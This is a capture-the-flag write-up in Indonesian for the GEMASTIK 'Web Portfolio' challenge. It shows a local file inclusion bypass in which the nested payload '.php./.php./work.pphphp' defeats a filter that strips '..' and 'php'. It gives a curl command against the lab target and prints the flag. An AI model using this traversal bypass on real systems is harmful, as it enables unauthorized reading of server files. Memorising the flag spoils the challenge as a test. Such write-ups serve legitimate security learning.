Web Portfolio - 100 Points

http://target.netsec.gemastik.ui.ac.id:60013/f48d89678975d340fe860d08b3c03d1d/

POC

kami mengidentifikasi adalanya LFI pada parameter project

http://target.netsec.gemastik.ui.ac.id:60013/f48d89678975d340fe860d08b3c03d1d/work.php?project=<path>

namun ada filter yang di terapkan sehingga kita tidak bisa dengan mudah untuk melakukan directory traversal

..         =>     ""
php        =>     ""

titik2 di replace menjadi empty string dan php juga, kita bisa menggunakan kombinasi kedua itu untuk melakukan abuse terhadap scriptnya dan menghasilkan ../../work.php

.php./.php./work.pphphp    =>    "../../work.php"

kita memisahkan titik dua dengan php dan memisahkan php dengan php sehingga terbentuklah path yang ingin kita tuju

curl http://target.netsec.gemastik.ui.ac.id:60013/f48d89678975d340fe860d08b3c03d1d/work.php?project=.php./.php./work.pphphp

Flag: GEMASTIK{i_dunno_why_simple_lfd_is_pretty_common}

results matching ""

    No results matching ""